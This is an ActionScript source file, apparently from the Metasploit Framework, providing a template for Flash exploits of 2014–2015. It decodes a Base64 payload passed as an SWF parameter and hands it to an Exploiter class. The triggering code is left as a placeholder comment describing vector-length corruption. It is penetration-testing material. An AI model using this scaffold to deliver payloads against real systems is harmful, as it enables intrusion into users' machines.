GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/flash_exploiter/Exploit.as
/* 
Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild during 2014/2015.

It uses some ideas and code included in @hdarwin89's proofs of concept.

* How to build:
    1. Download the AIR SDK and use its compiler.
    2. Download the Flex SDK (4.6).
    3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIR SDK folder (<AIR_SDK>/framework/libs)
        (all of them, including subfolders, especially mx, which is necessary for the Base64Decoder).
    4. Build with: mxmlc -o msf.swf Exploit.as

*/

package
{
    import flash.display.Sprite
    import flash.display.LoaderInfo
    import mx.utils.Base64Decoder
    import flash.utils.ByteArray

    public class Exploit extends Sprite
    {
        private var uv:Vector.<uint>
        private var b64:Base64Decoder = new Base64Decoder()
        private var payload:ByteArray
        private var platform:String
        private var exploiter:Exploiter
                
        public function Exploit()
        {
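            // Target platform, read from the "pl" parameter passed to the SWF
            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
            // Base64-encoded payload, read from the "sh" parameter passed to the SWF
            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
            // Turn spaces in the parameter back into "+" before Base64 decoding
            var pattern:RegExp = / /g;
            b64_payload = b64_payload.replace(pattern, "+")
            b64.decode(b64_payload)
            payload = b64.toByteArray()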
              
            /* 
                The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
            */
            
            exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
        }
    }
}